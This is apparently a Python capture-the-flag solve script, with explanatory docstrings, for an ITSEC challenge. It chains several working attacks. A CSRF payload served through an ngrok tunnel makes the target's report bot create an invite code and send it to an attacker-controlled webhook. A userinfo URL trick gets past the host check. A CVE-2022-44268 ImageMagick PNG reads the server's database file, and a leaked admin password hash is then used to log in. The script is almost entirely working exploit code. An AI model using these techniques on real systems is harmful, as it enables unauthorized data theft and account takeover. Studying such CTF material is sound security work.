| from pyngrok import ngrok | |
| from flask import Flask, request | |
| from urllib.parse import urljoin | |
| from PIL import Image, PngImagePlugin | |
| from bs4 import BeautifulSoup | |
| import threading | |
| import requests | |
| import urllib3 | |
| import io | |
| import time | |
| import base64 | |
# --- Shared HTTP client and local listener configuration ---
# A single Session is used for every call to the target so that the cookie
# set by /api/login is reused by the later /api/upload, /home and /flag
# requests. TLS verification is switched off and all traffic is routed
# through a local intercepting proxy on 127.0.0.1:8080 (for inspection).
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

headers = {
    'Content-Type': 'application/json',
}
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080',
}

sess = requests.Session()
sess.headers.update(headers)
sess.proxies = proxies
sess.verify = False

# url = "https://localhost:1337/"
url = "https://54.254.152.24:1337/"  # challenge instance; the commented line is the local copy

# Local Flask listener exposed through an ngrok tunnel so the target's report
# bot can reach /stage1 and /leak. Only the host part is kept; the scheme is
# re-added where the callback URL is built.
port = 5000
public_url = ngrok.connect(port).public_url.replace("https://", "")
app = Flask(__name__)

# Account that gets created with the leaked invite code. invite_code starts
# empty and is written by the /leak handler from the Flask thread.
username = "test"
password = "a"
invite_code = None
@app.route("/stage1", methods=["POST", "GET"])
def stage1():
    """Serve the page that the target's report feature is pointed at.

    The returned HTML is an inline script which, in the visiting browser
    (presumably the report bot, since the fetches use ``credentials: 'include'``
    and the bot's cookies), creates an invite code for USERNAME on the target
    and POSTs the JSON reply to this script's /leak endpoint. The fetch URLs
    are ``https://localhost:1337``, i.e. they resolve on the host where the
    script runs, not the public IP in ``url``.

    WEBHOOK_URL and USERNAME are substituted from the module-level
    ``public_url`` and ``username``. The first request is ``mode: "no-cors"``,
    so its response is opaque; only the second (GET) response is read.

    Defensive note: this works because the invite-code endpoints accept
    cross-site requests carrying the bot's session cookie; SameSite cookies
    or a CSRF/origin check on those endpoints would break this step.

    Returns:
        ``(html, 200)`` — the page body and HTTP status.
    """
    html = """
<script>
  (async () => {
    response = await fetch(`https://localhost:1337/api/add-invite-code`, {
      method: "POST",
      credentials: 'include',
      mode: "no-cors",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify({
        username: "USERNAME"
      })
    });
    response = await fetch(`https://localhost:1337/api/invite-code/USERNAME`, {
      method: "GET",
      credentials: 'include'
    });
    response = await response.json();
    await fetch(`WEBHOOK_URL`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify(response)
    });
  })();
</script>
""".replace("WEBHOOK_URL", f"https://{public_url}/leak").replace("USERNAME", username)
    return html, 200
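@app.route("/leak", methods=["POST", "GET"])
def getleak():
    """Receive the JSON posted by the /stage1 script and store the invite code.

    The body is expected to look like ``{"invite_code": {"code": "..."}}``
    (inferred only from the key path used here — it is whatever the target's
    ``/api/invite-code/<user>`` endpoint returns). The code is written to the
    module-level ``invite_code``, which the main thread polls.

    Returns:
        ``("oke", 200)`` on success; ``("bad request", 400)`` when the body
        is not JSON or does not contain the expected keys.
    """
    global invite_code
    # leak = request.data
    # silent=True yields None instead of raising on a non-JSON body.
    leak = request.get_json(silent=True)
    try:
        invite_code = leak['invite_code']['code']
    except (TypeError, KeyError) as e:
        # Unexpected shape (None, missing key, non-dict value): report it and
        # keep the main thread polling rather than crashing the handler.
        print("unexpected /leak body:", leak, e)
        return "bad request", 400
    print(f"{invite_code = }")
    # The original returned status 20, which is not a valid HTTP status code.
    return "oke", 200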
def exploitMagick(read_file_path):  # cve 2022 44268
    """Build a minimal PNG whose ``profile`` tEXt chunk holds *read_file_path*.

    This is the CVE-2022-44268 trigger: an ImageMagick build affected by that
    issue treats the value of a ``profile`` text chunk as a local file name
    and, when it re-encodes the image, copies that file's contents into the
    output's metadata (read back later by ``extract_image``). A patched
    ImageMagick, or stripping/rejecting PNG text chunks on upload, closes
    this.

    Args:
        read_file_path: path string to place in the ``profile`` chunk.

    Returns:
        The encoded PNG as ``bytes``.
    """
    png_info = PngImagePlugin.PngInfo()
    png_info.add_text("profile", read_file_path)
    canvas = Image.new('RGB', (1, 1), color='white')
    out = io.BytesIO()
    canvas.save(out, "PNG", pnginfo=png_info)
    # getvalue() returns the whole buffer regardless of position.
    return out.getvalue()
def register(username, password, invite_code):
    """POST ``/api/register`` on the target with the given credentials and invite code.

    The email is a fixed dummy value. Nothing is returned; success is only
    observable through the subsequent login. ``headers`` and ``verify`` are
    passed again although ``sess`` already carries both.
    """
    body = {
        'username': username,
        'email': '[email protected]',
        'password': password,
        'invite_code': invite_code,
    }
    endpoint = urljoin(url, '/api/register')
    sess.post(endpoint, headers=headers, json=body, verify=False)
def login(username, password):
    """POST ``/api/login`` on the target; the session cookie is retained by ``sess``.

    Nothing is returned — later requests rely on the session's cookie jar
    rather than on inspecting this response.
    """
    sess.post(
        urljoin(url, '/api/login'),
        headers=headers,
        json={'username': username, 'password': password},
        verify=False,
    )
def upload(dummy_png):
    """POST ``/api/upload`` with the PNG bytes base64-encoded under the ``image`` key.

    Nothing is returned; the effect is checked afterwards via
    ``extract_image()``.
    """
    encoded = base64.b64encode(dummy_png).decode('utf-8')
    sess.post(
        urljoin(url, '/api/upload'),
        headers=headers,
        json={'image': encoded},
        verify=False,
    )
def hex_to_bytes(hex_str):
    """Decode a hex string to bytes, left-padding with ``'0'`` when its length is odd.

    Args:
        hex_str: hexadecimal digits (``bytes.fromhex`` rules apply, so
            whitespace between byte pairs is tolerated).

    Returns:
        The decoded ``bytes``; ``b''`` for an empty string.
    """
    padded = hex_str if len(hex_str) % 2 == 0 else '0' + hex_str
    return bytes.fromhex(padded)
def extract_image():
    """Fetch the last ``<img>`` on ``/home`` and pull the leaked file out of its metadata.

    After the server re-encodes the uploaded PNG, it is expected to carry a
    ``Raw profile type ...`` text chunk whose value is one header line
    followed by hex-encoded file contents (the layout produced by the
    CVE-2022-44268 issue). Those hex lines are concatenated and decoded.

    Returns:
        The decoded ``bytes`` when a matching chunk was parsed; otherwise the
        empty string ``""`` (note the return type differs in that case).
    """
    response = sess.get(urljoin(url, '/home'))
    soup = BeautifulSoup(response.text, 'html.parser')
    # Assumes the most recently uploaded image is rendered last on the page.
    image_url = soup.find_all('img')[-1]['src']
    print(f"{image_url = }")
    response = sess.get(urljoin(url, image_url))
    # Keep a copy on disk for manual inspection.
    with open("a.png", "wb") as f:
        f.write(response.content)
    image = Image.open(io.BytesIO(response.content))
    info = image.info
    result = ""
    for k, v in info.items():
        if 'Raw profile type' in k:
            try:
                # First line is a header (type/size); the remaining lines are hex.
                exfil = v.strip().split('\n')
                for hexVal in exfil[1:]:
                    result += hexVal.strip()
                result = hex_to_bytes(result)
                # NOTE(review): result is now bytes, so a second matching chunk
                # would hit `bytes += str` and end up in the except branch.
            except BaseException as e:
                # NOTE(review): BaseException also swallows KeyboardInterrupt;
                # `except ValueError` (bad hex) would be the narrower choice.
                print("err", e)
                pass
    return result
# --- Exploit chain driver (runs at import time; there is no __main__ guard) ---

# 1. Start the Flask listener in the background so the ngrok tunnel has
#    something to forward to. daemon=True lets the process exit without
#    joining this thread.
server_thread = threading.Thread(target=lambda: app.run(host='0.0.0.0', port=port, debug=False))
server_thread.daemon = True
server_thread.start()

# 2. Ask the target's report feature to visit /stage1. The submitted URL has
#    "localhost:1337" in the userinfo position, so the browser actually
#    connects to the ngrok host; why the URL is shaped this way is not visible
#    here. Defensive note: a validator should compare the parsed hostname,
#    not a string prefix, or userinfo like this passes unnoticed.
json_data = {
    'url': f'https://localhost:1337@{public_url}/stage1',
}
response = sess.post(urljoin(url, '/api/report'), headers=headers, json=json_data, verify=False)

# 3. Block until /leak has stored the invite code.
#    NOTE(review): no timeout — if the bot never calls back this loops forever.
while not invite_code:
    time.sleep(1)

# 4. Register with the leaked code and log in (cookie kept by sess).
register(username, password, invite_code)
login(username, password)

# 5. Upload the crafted PNG (CVE-2022-44268) naming the server-side file to
#    read, then recover that file's contents from the re-encoded image.
# dummy_png = exploitMagick("/etc/passwd")
dummy_png = exploitMagick("/app/instance/database.db")
upload(dummy_png)
result = extract_image()
# extract_image returns bytes on success and "" otherwise; "".split() is
# empty, so the loop is simply skipped in the failure case.
for i in result.split():
    if b"[email protected]" in i:
        print(i)

# 6. The 64-hex-digit value below was copied from the dumped database —
#    presumably the admin's stored password hash, which the login endpoint
#    evidently accepts as the password (cannot be confirmed from here).
leak_admin_passwd = "dc900fdb915ee0d31d8daec80ff5a98968e5c690582d214db24462ac871d4c6d"
login("admin", leak_admin_passwd)
resp = sess.get(urljoin(url, '/flag'))

import re  # NOTE(review): belongs with the other imports at the top of the file
flag_match = re.search(r'ITSEC\{.*?\}', resp.text)
if flag_match:
    print(flag_match.group(0))  # ITSEC{ch41n1n9_th3_vuln_t0g3th3rr}
else:
    print("Flag not found in response")